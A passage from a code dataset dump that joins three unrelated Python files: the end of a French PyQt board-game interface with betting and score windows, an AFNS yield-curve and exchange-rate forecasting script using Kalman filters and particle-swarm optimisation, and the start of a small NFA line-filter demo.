points il a gagné\n self.reset() #On reset le plateau\n\n if self.tour_joueur%2==0: #Strictement identique que le if au dessus mais avec le joueur 2\n self.p.un_tour_joueur_mise(self.a)\n self.actualiser_jetons()\n self.indic.setText(str(self.a.liste_joueurs[0].id)+', a toi de jouer')\n if self.a.p.menu == [0.0, 0.0, 0.0, 0.0, 0.0] and (self.a.liste_joueurs[1].points+self.a.m.mise)>=5:\n self.a.liste_joueurs[1].points += self.a.m.mise\n self.score_j2.setText('Score : ' + str(self.a.liste_joueurs[1].points))\n if self.a.m.mise>1:\n self.topic.setText(str(self.a.liste_joueurs[1].id)+' a gagne '+str(self.a.m.mise)+' points')\n else:\n self.topic.setText(str(self.a.liste_joueurs[1].id)+' a gagne '+str(self.a.m.mise)+' point')\n self.resultats.show()\n self.resultats.message.setText(str(self.a.liste_joueurs[1].id)+\" gagne avec : \"+str(self.a.liste_joueurs[1].points)+\" points\")\n elif self.a.p.menu == [0.0, 0.0, 0.0, 0.0, 0.0]:\n self.peut_jouer=False\n self.repaint()\n time.sleep(0.5)\n self.peut_jouer=True\n self.a.liste_joueurs[1].points+=self.a.m.mise\n self.score_j2.setText('Score : '+str(self.a.liste_joueurs[1].points))\n if self.a.m.mise>1:\n self.topic.setText(str(self.a.liste_joueurs[1].id)+' a gagne '+str(self.a.m.mise)+' points')\n else:\n self.topic.setText(str(self.a.liste_joueurs[1].id)+' a gagne '+str(self.a.m.mise)+' point')\n self.reset()\n if self.a_reset==False: #Si ça n'a pas été reset, on augmente tour_joueur pour qu'au prochain apppel, c'est le joueur suivant qui joue\n self.tour_joueur += 1 #Parce que dans le reset, on remet le numéro de joueur à 1\n self.p.annulation=False #On reinitialise : annulation,\n self.p.rejouer=False #Rejouer,\n self.deja_mise=False #Et deja mise\n self.affichage_mise.setText('Mise : ' + str(self.a.m)) #Et on met à jour la mise\n\n\n def reset(self):\n self.a_reset=True #On indique que le plateau a été réinitialisé\n self.a.m.mise=1 #On remet la mise à 1\n self.jeton_mise=0 #On remet le jeton de mise au milieu\n self.jeton_j1.setPixmap(self.c_rien) #On supprime le jeton de mise sur le plateau\n self.jeton_j2.setPixmap(self.c_rien)\n self.indic.setText(str(self.a.liste_joueurs[0].id) + ' a toi de jouer') #On le précise sur l'interface\n self.a.mise_en_place_jetons() #On remet des jetons aléatoirement\n self.a.p.calcul_menu(self.a.c.pos[0], self.a.c.pos[1]) #On recalcule le menu\n self.actualiser_jetons() #On actualise le plateau\n self.tour_joueur=1 #On redemande au joueur 1 de jouer\n self.repaint() #Et on actualise l'interface\n\n\n def miser_j1(self):\n if (self.tour_joueur==1 or self.tour_joueur%2==1) and self.a.m.mise<5 and self.deja_mise==False and (self.jeton_mise==0 or self.jeton_mise==2): #Si c'est le tour du joueur 1 et qu'il a pas déja misé\n self.deja_mise=True #On dit qu'il a misé\n self.jeton_mise=1 #Le joueur 1 a le jeton de mise et ne peut plus surrencherir\n self.jeton_j1.setPixmap(self.jeton.scaled(self.jeton_j1.size(),QtCore.Qt.IgnoreAspectRatio,QtCore.Qt.SmoothTransformation)) #On place le jeton sur l'emplacement en dessous du score du Joueur 1\n self.jeton_j2.setPixmap(self.c_rien) #Rien pour le joueur 2\n self.mise.acc.setText(str(self.a.liste_joueurs[1].id) + \" acceptes-tu l'augmentation de mise ?\") #Texte pour la phrase sur la fenêtre de mise\n self.mise.show() #On affiche la fenêtre des mises\n\n\n def miser_j2(self): #Pareil mais pour le joueur 2\n if self.tour_joueur%2==0 and self.a.m.mise<5 and self.deja_mise==False and (self.jeton_mise==1 or self.jeton_mise==0):\n self.deja_mise=True\n self.jeton_mise=2\n self.jeton_j2.setPixmap(self.jeton.scaled(self.jeton_j2.size(),QtCore.Qt.IgnoreAspectRatio,QtCore.Qt.SmoothTransformation))\n self.jeton_j1.setPixmap(self.c_rien)\n self.mise.acc.setText(str(self.a.liste_joueurs[0].id) + \" acceptes-tu l'augmentation de mise ?\")\n self.mise.show()\n\n\n def couleur(self, i, j):\n \"\"\"Cette méthode permet de retourner la couleur en fonction du numéro présent sur le plateau\"\"\"\n if self.p[i, j] == 1: #Les différentes couleurs\n return self.c_rouge\n if self.p[i, j] == 2:\n return self.c_vert\n if self.p[i, j] == 3:\n return self.c_jaune\n if self.p[i, j] == 4:\n return self.c_bleu\n if self.p[i, j] == 5:\n return self.c_gris\n\n if self.p[i, j] == 9 and i==0: #Le caméléon en fonction de s'il est en haut, en bas, à gauche ou à droite du plateau\n return self.cameleon_haut\n if self.p[i, j] == 9 and i==6:\n return self.cameleon_bas\n if self.p[i, j] == 9 and j==0:\n return self.cameleon_gauche\n if self.p[i, j] == 9 and j==6:\n return self.cameleon_droite\n\n if self.p[i,j]==-1: #Les coins du plateau\n return self.c_rien\n\n if self.p[i,j] ==0 and i!=0 and i!=6 and j!=0 and j!=6: #Les cases vides de l'intérieur du plateau (jeton retourné)\n return self.c_mort\n if self.p[i,j] ==0 and i==0: #Les contours du plateau\n return self.bas\n if self.p[i, j] == 0 and i==6:\n return self.haut\n if self.p[i, j] == 0 and j==0:\n return self.droite\n if self.p[i, j] == 0 and j==6:\n return self.gauche\n\n\n def type(self, num, manges):\n \"\"\"Sert à retourner ce que l'ordi à mangé. Utilisé dans les méthode Plateau.un_tour_ia_facile/normale/difficile\"\"\"\n if num == 1 and manges == 1:\n return 'rouge'\n if num == 2 and manges == 1:\n return 'vert'\n if num == 3 and manges == 1:\n return 'jaune'\n if num == 4 and manges == 1:\n return 'bleu'\n if num == 5:\n return 'gris'\n if num == 1 and manges != 1:\n return 'rouges'\n if num == 2 and manges != 1:\n return 'verts'\n if num == 3 and manges != 1:\n return 'jaunes'\n if num == 4 and manges != 1:\n return 'bleus'\n\n\n def actualiser_jetons(self):\n \"\"\"Charge les images des jetons sur le plateau\"\"\"\n self.label_1.setPixmap(self.couleur(0,0).scaled(self.label_1.size(),QtCore.Qt.IgnoreAspectRatio,QtCore.Qt.SmoothTransformation)) #Appelle la méthode PlateauUi.couleur() au dessus pour savoir quel fichier charger\n self.label_2.setPixmap(self.couleur(0, 1).scaled(self.label_2.size(),QtCore.Qt.IgnoreAspectRatio,QtCore.Qt.SmoothTransformation)) #Le.scaled permet de redimensionner l'image à la taille du Qlabel\n self.label_3.setPixmap(self.couleur(0, 2).scaled(self.label_3.size(),QtCore.Qt.IgnoreAspectRatio,QtCore.Qt.SmoothTransformation))\n self.label_4.setPixmap(self.couleur(0, 3).scaled(self.label_4.size(),QtCore.Qt.IgnoreAspectRatio,QtCore.Qt.SmoothTransformation))\n self.label_5.setPixmap(self.couleur(0, 4).scaled(self.label_5.size(),QtCore.Qt.IgnoreAspectRatio,QtCore.Qt.SmoothTransformation))\n self.label_6.setPixmap(self.couleur(0, 5).scaled(self.label_6.size(),QtCore.Qt.IgnoreAspectRatio,QtCore.Qt.SmoothTransformation))\n self.label_7.setPixmap(self.couleur(0, 6).scaled(self.label_7.size(),QtCore.Qt.IgnoreAspectRatio,QtCore.Qt.SmoothTransformation))\n self.label_8.setPixmap(self.couleur(1, 0).scaled(self.label_8.size(),QtCore.Qt.IgnoreAspectRatio,QtCore.Qt.SmoothTransformation))\n self.label_9.setPixmap(self.couleur(1, 1).scaled(self.label_9.size(),QtCore.Qt.IgnoreAspectRatio,QtCore.Qt.SmoothTransformation))\n self.label_10.setPixmap(self.couleur(1, 2).scaled(self.label_10.size(),QtCore.Qt.IgnoreAspectRatio,QtCore.Qt.SmoothTransformation))\n self.label_11.setPixmap(self.couleur(1, 3).scaled(self.label_11.size(),QtCore.Qt.IgnoreAspectRatio,QtCore.Qt.SmoothTransformation))\n self.label_12.setPixmap(self.couleur(1, 4).scaled(self.label_12.size(),QtCore.Qt.IgnoreAspectRatio,QtCore.Qt.SmoothTransformation))\n self.label_13.setPixmap(self.couleur(1, 5).scaled(self.label_13.size(),QtCore.Qt.IgnoreAspectRatio,QtCore.Qt.SmoothTransformation))\n self.label_14.setPixmap(self.couleur(1, 6).scaled(self.label_14.size(),QtCore.Qt.IgnoreAspectRatio,QtCore.Qt.SmoothTransformation))\n self.label_15.setPixmap(self.couleur(2, 0).scaled(self.label_15.size(),QtCore.Qt.IgnoreAspectRatio,QtCore.Qt.SmoothTransformation))\n self.label_16.setPixmap(self.couleur(2, 1).scaled(self.label_16.size(),QtCore.Qt.IgnoreAspectRatio,QtCore.Qt.SmoothTransformation))\n self.label_17.setPixmap(self.couleur(2, 2).scaled(self.label_17.size(),QtCore.Qt.IgnoreAspectRatio,QtCore.Qt.SmoothTransformation))\n self.label_18.setPixmap(self.couleur(2, 3).scaled(self.label_18.size(),QtCore.Qt.IgnoreAspectRatio,QtCore.Qt.SmoothTransformation))\n self.label_19.setPixmap(self.couleur(2, 4).scaled(self.label_19.size(),QtCore.Qt.IgnoreAspectRatio,QtCore.Qt.SmoothTransformation))\n self.label_20.setPixmap(self.couleur(2, 5).scaled(self.label_20.size(),QtCore.Qt.IgnoreAspectRatio,QtCore.Qt.SmoothTransformation))\n self.label_21.setPixmap(self.couleur(2, 6).scaled(self.label_21.size(),QtCore.Qt.IgnoreAspectRatio,QtCore.Qt.SmoothTransformation))\n self.label_22.setPixmap(self.couleur(3, 0).scaled(self.label_22.size(),QtCore.Qt.IgnoreAspectRatio,QtCore.Qt.SmoothTransformation))\n self.label_23.setPixmap(self.couleur(3, 1).scaled(self.label_23.size(),QtCore.Qt.IgnoreAspectRatio,QtCore.Qt.SmoothTransformation))\n self.label_24.setPixmap(self.couleur(3, 2).scaled(self.label_24.size(),QtCore.Qt.IgnoreAspectRatio,QtCore.Qt.SmoothTransformation))\n self.label_25.setPixmap(self.couleur(3, 3).scaled(self.label_25.size(),QtCore.Qt.IgnoreAspectRatio,QtCore.Qt.SmoothTransformation))\n self.label_26.setPixmap(self.couleur(3, 4).scaled(self.label_26.size(),QtCore.Qt.IgnoreAspectRatio,QtCore.Qt.SmoothTransformation))\n self.label_27.setPixmap(self.couleur(3, 5).scaled(self.label_27.size(),QtCore.Qt.IgnoreAspectRatio,QtCore.Qt.SmoothTransformation))\n self.label_28.setPixmap(self.couleur(3, 6).scaled(self.label_28.size(),QtCore.Qt.IgnoreAspectRatio,QtCore.Qt.SmoothTransformation))\n self.label_29.setPixmap(self.couleur(4, 0).scaled(self.label_29.size(),QtCore.Qt.IgnoreAspectRatio,QtCore.Qt.SmoothTransformation))\n self.label_30.setPixmap(self.couleur(4, 1).scaled(self.label_30.size(),QtCore.Qt.IgnoreAspectRatio,QtCore.Qt.SmoothTransformation))\n self.label_31.setPixmap(self.couleur(4, 2).scaled(self.label_31.size(),QtCore.Qt.IgnoreAspectRatio,QtCore.Qt.SmoothTransformation))\n self.label_32.setPixmap(self.couleur(4, 3).scaled(self.label_32.size(),QtCore.Qt.IgnoreAspectRatio,QtCore.Qt.SmoothTransformation))\n self.label_33.setPixmap(self.couleur(4, 4).scaled(self.label_33.size(),QtCore.Qt.IgnoreAspectRatio,QtCore.Qt.SmoothTransformation))\n self.label_34.setPixmap(self.couleur(4, 5).scaled(self.label_34.size(),QtCore.Qt.IgnoreAspectRatio,QtCore.Qt.SmoothTransformation))\n self.label_35.setPixmap(self.couleur(4, 6).scaled(self.label_35.size(),QtCore.Qt.IgnoreAspectRatio,QtCore.Qt.SmoothTransformation))\n self.label_36.setPixmap(self.couleur(5, 0).scaled(self.label_36.size(),QtCore.Qt.IgnoreAspectRatio,QtCore.Qt.SmoothTransformation))\n self.label_37.setPixmap(self.couleur(5, 1).scaled(self.label_37.size(),QtCore.Qt.IgnoreAspectRatio,QtCore.Qt.SmoothTransformation))\n self.label_38.setPixmap(self.couleur(5, 2).scaled(self.label_38.size(),QtCore.Qt.IgnoreAspectRatio,QtCore.Qt.SmoothTransformation))\n self.label_39.setPixmap(self.couleur(5, 3).scaled(self.label_39.size(),QtCore.Qt.IgnoreAspectRatio,QtCore.Qt.SmoothTransformation))\n self.label_40.setPixmap(self.couleur(5, 4).scaled(self.label_40.size(),QtCore.Qt.IgnoreAspectRatio,QtCore.Qt.SmoothTransformation))\n self.label_41.setPixmap(self.couleur(5, 5).scaled(self.label_41.size(),QtCore.Qt.IgnoreAspectRatio,QtCore.Qt.SmoothTransformation))\n self.label_42.setPixmap(self.couleur(5, 6).scaled(self.label_42.size(),QtCore.Qt.IgnoreAspectRatio,QtCore.Qt.SmoothTransformation))\n self.label_43.setPixmap(self.couleur(6, 0).scaled(self.label_43.size(),QtCore.Qt.IgnoreAspectRatio,QtCore.Qt.SmoothTransformation))\n self.label_44.setPixmap(self.couleur(6, 1).scaled(self.label_44.size(),QtCore.Qt.IgnoreAspectRatio,QtCore.Qt.SmoothTransformation))\n self.label_45.setPixmap(self.couleur(6, 2).scaled(self.label_45.size(),QtCore.Qt.IgnoreAspectRatio,QtCore.Qt.SmoothTransformation))\n self.label_46.setPixmap(self.couleur(6, 3).scaled(self.label_46.size(),QtCore.Qt.IgnoreAspectRatio,QtCore.Qt.SmoothTransformation))\n self.label_47.setPixmap(self.couleur(6, 4).scaled(self.label_47.size(),QtCore.Qt.IgnoreAspectRatio,QtCore.Qt.SmoothTransformation))\n self.label_48.setPixmap(self.couleur(6, 5).scaled(self.label_48.size(),QtCore.Qt.IgnoreAspectRatio,QtCore.Qt.SmoothTransformation))\n self.label_49.setPixmap(self.couleur(6, 6).scaled(self.label_49.size(),QtCore.Qt.IgnoreAspectRatio,QtCore.Qt.SmoothTransformation))\n\n\n\n\nclass MiseUi(QtWidgets.QMainWindow):\n \"\"\"Interface pour l'augmentation de mise\n On rappelle que lorsqu'on créé un arbitre, une mise a.m est créée\"\"\"\n def __init__(self,ui):\n QtWidgets.QMainWindow.__init__(self)\n QtGui.QFontDatabase.addApplicationFont(\"Jungle Roar Bold.ttf\") #On importe la police pour cette classe\n self.ui = uic.loadUi('mises.ui', self) #On charge le bon fichier\n self.ui.accept.clicked.connect(self.accepter) #Bouton accepter\n self.ui.refuse.clicked.connect(self.refuser) #Bouton refuser\n self.mere=ui #Interface de type PlateauUi\n\n palette = QtGui.QPalette() #Ces 4 lignes servent pour l'image d'arrière plan\n pixmap = QtGui.QPixmap(\"fond_mise.jpg\")\n palette.setBrush(QtGui.QPalette.Background, QtGui.QBrush(pixmap))\n self.setPalette(palette)\n\n self.acc.setFont(QtGui.QFont('Jungle Roar', pointSize=10))\n\n def accepter(self): #Si le second joueur accepte la surrenchère de mise\n self.mere.a.m.incrementer_mise() #On augmente la mise de 1\n self.mere.affichage_mise.setText('Mise : ' + str(self.mere.a.m)) #On affiche la nouvelle valeur de mise\n self.repaint() #On actualise l'interface\n self.rejouer=True #On demande au joueur qui a proposé l'enchère de rejouer\n self.close() #On ferme cette fenêtre\n\n\n def refuser(self): #Si le second joueur refuse\n self.annulation=True #Annulation devient True\n if self.mere.tour_joueur==1 or self.mere.tour_joueur%2==1: #Si c'est le tour du joueur 1\n self.mere.a.liste_joueurs[0].points+=self.mere.a.m.mise #Le joueur 2 refuse du coup le joueur 1 gagne les points de la mise\n if self.mere.a.m.mise >1: #On affiche le nombre de points gagnés\n self.mere.topic.setText(str(self.mere.a.liste_joueurs[0].id) + ' a gagne ' + str(self.mere.a.m.mise) + ' points')\n else:\n self.mere.topic.setText(str(self.mere.a.liste_joueurs[0].id) + ' a gagne ' + str(self.mere.a.m.mise) + ' point')\n if self.mere.tour_joueur%2==0: #Même chose pour le joueur 2\n self.mere.a.liste_joueurs[1].points+=self.mere.a.m.mise\n if self.mere.a.m.mise >1:\n self.mere.topic.setText(str(self.mere.a.liste_joueurs[1].id) + ' a gagne ' + str(self.mere.a.m.mise) + ' points')\n else:\n self.mere.topic.setText(str(self.mere.a.liste_joueurs[1].id) + ' a gagne ' + str(self.mere.a.m.mise) + ' point')\n\n if (self.mere.tour_joueur==1 or self.mere.tour_joueur%2==1) and (self.mere.a.liste_joueurs[0].points) >= 5: #Dans le cas où le refus entraine la victoire du joueur 1\n self.mere.score_j1.setText('Score : ' + str(self.mere.a.liste_joueurs[0].points)) #On actualise les scores\n if self.mere.a.m.mise >1:\n self.mere.topic.setText(str(self.mere.a.liste_joueurs[0].id) + ' a gagne ' + str(self.mere.a.m.mise) + ' points')\n else:\n self.mere.topic.setText(str(self.mere.a.liste_joueurs[0].id) + ' a gagne ' + str(self.mere.a.m.mise) + ' point')\n self.mere.resultats.show() #On affiche la fenêtre réultat\n self.mere.resultats.message.setText(str(self.mere.a.liste_joueurs[0].id) + \" gagne avec : \" + str(self.mere.a.liste_joueurs[0].points) + \" points\") #Et son nombre de points\n elif (self.mere.tour_joueur%2==0) and (self.mere.a.liste_joueurs[1].points) >= 5: #Pareil si le refus entraîne la victoire du joueur 2\n self.mere.score_j2.setText('Score : ' + str(self.mere.a.liste_joueurs[1].points))\n if self.mere.a.m.mise >1:\n self.mere.topic.setText(str(self.mere.a.liste_joueurs[1].id) + ' a gagne ' + str(self.mere.a.m.mise) + ' points')\n else:\n self.mere.topic.setText(str(self.mere.a.liste_joueurs[1].id) + ' a gagne ' + str(self.mere.a.m.mise) + ' point')\n self.mere.resultats.show()\n self.mere.resultats.message.setText(str(self.mere.a.liste_joueurs[1].id) + \" gagne avec : \" + str(self.mere.a.liste_joueurs[1].points) + \" points\")\n else: #Si le refus n'entraîne pas une victoire\n self.mere.reset() #Manche suivante, on reset le plateau\n self.mere.score_j1.setText('Score : ' + str(self.mere.a.liste_joueurs[0].points)) #On actualise les scores\n self.mere.score_j2.setText('Score : ' + str(self.mere.a.liste_joueurs[1].points))\n self.mere.affichage_mise.setText('Mise : 1') #La mise est de nouveau à 1\n self.mere.deja_mise = False #Deja_mise redevient faux\n self.repaint() #Actualisation de l'interface\n self.close() #Fermeture de la fenêtre de mise\n\n\n\nclass ScoresUi(QtWidgets.QMainWindow):\n def __init__(self,ui):\n QtWidgets.QMainWindow.__init__(self)\n QtGui.QFontDatabase.addApplicationFont(\"Jungle Roar Bold.ttf\") #On importe la police\n self.ui = uic.loadUi('scores.ui', self) #On charge le bon fichier d'interface\n self.ui.rejouer.clicked.connect(self.menu) #Bouton rejouer\n self.ui.quit.clicked.connect(self.quitter) #Bouton quitter\n self.message.setText(' ') #Le message est initialisé à rien\n self.message.setFont(QtGui.QFont('Jungle Roar', pointSize=16)) #Avec la nouvelle police\n self.fermer=ui #Fermer est l'interface de type PlateauUi() qu'il faudra fermer en appuyanty sur quitter ou rejouer\n\n palette = QtGui.QPalette() #Ces 4 lignes servent pour l'image d'arrière plan\n pixmap = QtGui.QPixmap(\"fond_scores.jpg\")\n palette.setBrush(QtGui.QPalette.Background, QtGui.QBrush(pixmap))\n self.setPalette(palette)\n\n\n def menu(self): #Si on clique sur rejouer\n self.close() #Cette fenêtre se ferme\n JeuUi().show() #Un nouveau menu se rouvre\n self.fermer.close() #Le plateau se ferme\n if self.fermer.sauv==True: #Si c'est une partie sauvegardée qu'on fini, alors on la supprime\n try:\n os.remove('sauvegarde.txt')\n except Exception:\n pass\n mixer.music.rewind() #On remet la musique de fond au début\n\n\n def quitter(self): #Si on clique sur fermer\n self.close() #On ferme cette fenêtre\n self.fermer.close() #Et on ferme le plateau\n if self.fermer.sauv==True: #Si c'est une partie sauvegardée qu'on fini, alors on la supprime\n try:\n os.remove('sauvegarde.txt')\n except Exception:\n pass\n mixer.music.rewind() #On remet la musique de fond au début\n\n\n\nclass ReglesUi(QtWidgets.QMainWindow):\n \"\"\"Permet d'afficher l'image avec les règles du jeu\"\"\"\n def __init__(self):\n QtWidgets.QMainWindow.__init__(self)\n QtGui.QFontDatabase.addApplicationFont(\"Jungle Roar Bold.ttf\") #On importe la nouvelle police\n self.ui = uic.loadUi('regles.ui', self) #On charge le bon fichier d'interface\n self.ui.actionRetour_au_menu.triggered.connect(self.retour_menu) #Pour retourner au menu\n\n palette = QtGui.QPalette() #Ces 4 lignes servent pour l'image d'arrière plan\n pixmap = QtGui.QPixmap(\"fond_regles.jpg\")\n palette.setBrush(QtGui.QPalette.Background, QtGui.QBrush(pixmap))\n self.setPalette(palette)\n\n\n def retour_menu(self): #Pour retourner au menu\n self.close() #On ferme la fenêtre des règles\n JeuUi().show() #Et on ouvre un nouveau menu\n\n\n\nif __name__ == \"__main__\":\n app = QtWidgets.QApplication(sys.argv)\n window = JeuUi() #On crée un menu que l'on appelle window\n window.show() #On l'ouvre\n sys.exit(app.exec_())","repo_name":"FrancoisSchmidt/Jeu_de_tong","sub_path":"ui.py","file_name":"ui.py","file_ext":"py","file_size_in_byte":54214,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"22447534713","text":"# This forecasts for a 3,6 and 12 months horizon. Training window is 5 years\r\n\r\nfrom AFNSGlobal.kalman_filter_functions import *\r\nfrom scipy.optimize import minimize\r\nfrom AFNSGlobal.fitted_yields_functions import *\r\nfrom AFNSGlobal.fx_functions import *\r\nimport pandas as pd\r\nimport numpy as np\r\nfrom pyswarm import pso\r\nimport time\r\n\r\nstart_time = time.time()\r\n\r\n# data import and selection\r\nrates_usd = pd.read_pickle(\"pickle_bootstrapped_usd.pickle\")\r\nrates_eur = pd.read_pickle(\"pickle_bootstrapped_eur.pickle\")\r\nrates_jpy = pd.read_pickle(\"pickle_bootstrapped_jpy.pickle\")\r\nrates_gbp = pd.read_pickle(\"pickle_bootstrapped_gbp.pickle\")\r\ndrop_list = [6, 7, 9, 10, 11, 12, 14, 16, 18]\r\nrates_usd.drop(rates_usd.columns[drop_list], axis=1, inplace=True)\r\nrates_eur.drop(rates_eur.columns[drop_list], axis=1, inplace=True)\r\nrates_jpy.drop(rates_jpy.columns[drop_list], axis=1, inplace=True)\r\nrates_gbp.drop(rates_gbp.columns[drop_list], axis=1, inplace=True)\r\nrates_dict = {\"usd\": rates_usd, \"eur\": rates_eur, \"jpy\": rates_jpy, \"gbp\": rates_gbp}\r\ntenors = np.array([1 / 12, 2 / 12, 3 / 12, 6 / 12, 1, 2, 5, 10, 15, 25])\r\ndf_fx = pd.read_pickle(\"fx_rates.pickle\")\r\n\r\ndf_fx.loc[:, \"USDEUR_1MCh\"] = -df_fx.loc[:, \"USDEUR\"].diff(-1) / df_fx.loc[:, \"USDEUR\"]\r\ndf_fx.loc[:, \"USDEUR_3MCh\"] = -df_fx.loc[:, \"USDEUR\"].diff(-3) / df_fx.loc[:, \"USDEUR\"]\r\ndf_fx.loc[:, \"USDEUR_6MCh\"] = -df_fx.loc[:, \"USDEUR\"].diff(-6) / df_fx.loc[:, \"USDEUR\"]\r\ndf_fx.loc[:, \"USDEUR_12MCh\"] = -df_fx.loc[:, \"USDEUR\"].diff(-12) / df_fx.loc[:, \"USDEUR\"]\r\ndf_fx.loc[:, \"GBPEUR_1MCh\"] = -df_fx.loc[:, \"GBPEUR\"].diff(-1) / df_fx.loc[:, \"GBPEUR\"]\r\ndf_fx.loc[:, \"GBPEUR_3MCh\"] = -df_fx.loc[:, \"GBPEUR\"].diff(-3) / df_fx.loc[:, \"GBPEUR\"]\r\ndf_fx.loc[:, \"GBPEUR_6MCh\"] = -df_fx.loc[:, \"GBPEUR\"].diff(-6) / df_fx.loc[:, \"GBPEUR\"]\r\ndf_fx.loc[:, \"GBPEUR_12MCh\"] = -df_fx.loc[:, \"GBPEUR\"].diff(-12) / df_fx.loc[:, \"GBPEUR\"]\r\ndf_fx.loc[:, \"JPYEUR_1MCh\"] = -df_fx.loc[:, \"JPYEUR\"].diff(-1) / df_fx.loc[:, \"JPYEUR\"]\r\ndf_fx.loc[:, \"JPYEUR_3MCh\"] = -df_fx.loc[:, \"JPYEUR\"].diff(-3) / df_fx.loc[:, \"JPYEUR\"]\r\ndf_fx.loc[:, \"JPYEUR_6MCh\"] = -df_fx.loc[:, \"JPYEUR\"].diff(-6) / df_fx.loc[:, \"JPYEUR\"]\r\ndf_fx.loc[:, \"JPYEUR_12MCh\"] = -df_fx.loc[:, \"JPYEUR\"].diff(-12) / df_fx.loc[:, \"JPYEUR\"]\r\n\r\nrates_dict = {\"usd\": rates_usd, \"eur\": rates_eur, \"jpy\": rates_jpy, \"gbp\": rates_gbp,\r\n \"fxusdeur\": df_fx.loc[:, ['USDEUR_1MCh', 'USDEUR_3MCh', 'USDEUR_6MCh','USDEUR_12MCh']],\r\n \"fxgbpeur\": df_fx.loc[:, ['GBPEUR_1MCh', 'GBPEUR_3MCh', 'GBPEUR_6MCh','GBPEUR_12MCh']],\r\n \"fxjpyeur\": df_fx.loc[:, ['JPYEUR_1MCh', 'JPYEUR_3MCh', 'JPYEUR_6MCh','JPYEUR_12MCh']]\r\n }\r\n\r\n#\r\niterations = 3\r\npso_maxiter = 150\r\npso_minstep = 1e-6\r\nn_swarm = 200\r\ntraining_window = 5 # numbers of years on which estimation is run\r\nsample_freq = 12\r\nforecasting_freq = 3 # forecasting frequency in months\r\ndelta_t = 1 / 12 # timedelta between observations\r\n\r\n# MINIMIZATION bounds\r\nb_sigma = (0.01, 0.1)\r\nb_theta_p = (-0.07, 0.07)\r\nb_kappa_p = (0.1, 1)\r\nb_lambda = (0.01, 1)\r\nb_sigma_obs = (0.0000001, 0.1)\r\n\r\nlbnds = 3 * [b_sigma[0]] + 3 * [b_theta_p[0]] + 3 * [b_kappa_p[0]] + [b_lambda[0]] + 3 * [b_sigma_obs[0]] + 2 * [\r\n b_sigma[0]] + 2 * [b_theta_p[0]] + 2 * [b_kappa_p[0]] + [b_lambda[0]]\r\nubnds = 3 * [b_sigma[1]] + 3 * [b_theta_p[1]] + 3 * [b_kappa_p[1]] + [b_lambda[1]] + 3 * [b_sigma_obs[1]] + 2 * [\r\n b_sigma[1]] + 2 * [b_theta_p[1]] + 2 * [b_kappa_p[1]] + [b_lambda[1]]\r\n\r\n# end_training_window = rates_dict[\"eur\"].index[0]+pd.DateOffset(years=training_window)\r\n\r\nlist_fc_dates = []\r\nlast_date = rates_dict[\"eur\"].iloc[-13, :].name\r\ni = 1\r\nwhile rates_dict[\"eur\"][:last_date].shape[0] > training_window * sample_freq:\r\n list_fc_dates.append(last_date)\r\n last_date = rates_dict[\"eur\"].iloc[rates_dict[\"eur\"].index.get_loc(last_date) - forecasting_freq, :].name\r\n i = i + 1\r\n\r\nlist_parameters_best = []\r\nlist_factors_best = []\r\n\r\nfor fc_date in list_fc_dates[::-1]:\r\n begin_estimation_window = fc_date + pd.DateOffset(months=-sample_freq * training_window + 1)\r\n begin_estimation_window = None\r\n print(\"Estimation Window: {} - {}\".format(begin_estimation_window, fc_date))\r\n result_columns = [\"LLH\", \"Level G\", \"Slope D\", \"Curvature D\", \"Slope F\", \"Curvature F\"]\r\n parameter_columns = [\"Sigma11G\", \"Sigma22D\", \"Sigma33D\", \"ThetaP1G\", \"ThetaP2D\", \"ThetaP3D\", \"KappaP11G\",\r\n \"KappaP22D\",\r\n \"KappaP33D\", \"LambdaD\",\r\n \"RSigmaST\", \"RSigmaMT\", \"RSigmaLT\", \"Sigma22F\", \"Sigma33F\", \"ThetaP2F\",\r\n \"ThetaP3F\", \"KappaP22F\",\r\n \"KappaP33F\", \"LambdaF\"]\r\n llh_best = np.inf\r\n\r\n curr_rates_dict = {\"eur\": rates_dict[\"eur\"].truncate(before=begin_estimation_window, after=fc_date),\r\n \"gbp\": rates_dict[\"gbp\"].truncate(before=begin_estimation_window, after=fc_date),\r\n \"fxgbpeur\": rates_dict[\"fxgbpeur\"].truncate(before=begin_estimation_window, after=fc_date)}\r\n\r\n # other arguments to transfer to kalman_afns\r\n other_args = (delta_t, tenors, curr_rates_dict, False)\r\n\r\n for i in range(iterations):\r\n res, fopt = pso(kalman_afns, args=other_args, lb=lbnds, ub=ubnds, maxiter=pso_maxiter, debug=False,\r\n swarmsize=n_swarm,\r\n minstep=pso_minstep)\r\n llh, df_factor_ts = kalman_afns(res, delta_t, tenors, curr_rates_dict, True)\r\n df_parameters = pd.DataFrame(np.reshape(res, (1, 20)), columns=parameter_columns, index=[fc_date])\r\n df_parameters = df_parameters.assign(loglh=[llh])\r\n if llh < llh_best:\r\n df_factor_ts[\"fcdate\"] = fc_date\r\n df_factor_ts.set_index('fcdate', append=True, inplace=True)\r\n df_factors_best = df_factor_ts\r\n df_parameters_best = df_parameters\r\n llh_best = llh\r\n print((i + 1) / iterations * 100, \"%\")\r\n print(\"---Elapsed time: %s seconds ---\" % (time.time() - start_time))\r\n list_factors_best.append(df_factors_best)\r\n list_parameters_best.append(df_parameters_best)\r\n print(llh_best)\r\ndf_fc_factors = pd.concat(list_factors_best)\r\ndf_fc_parameters = pd.concat(list_parameters_best)\r\ndf_fc_factors.to_pickle(\"fc_factors.pickle\")\r\ndf_fc_parameters.to_pickle(\"fc_parameters.pickle\")\r\n\r\n# slice for specific fc_date df_fc_factors.loc[(slice(None),\"2018-01-31\"),:]\r\n","repo_name":"tjdirks/afns-twoccy-ccycalib","sub_path":"AFNS-TwoCurrency-CcyCalib/AFNSGlobal/AFNS_forecasting.py","file_name":"AFNS_forecasting.py","file_ext":"py","file_size_in_byte":6412,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"23130399280","text":"import NFA2\nimport time\n\n\"\"\"\n A Python application to demonstrate the NFA2 class by\n using it to filter the standard input stream. Those\n lines that are accepted by NFA2 are echoed to the\n standard output.\n\"\"\"\n\ntry:\n s = input()\nexcept (EOFError):\n exit()\n\nstart_time = time.time()\nwhile True:\n NFA2.reset()\n NFA2.process(s)\n if NFA2.accepted():\n print(s)\n try:\n s = input()\n except (EOFError):\n print(time.time() - start_time)\n exit()","repo_name":"ryantillis/csc333","sub_path":"NFA - Backtrack and 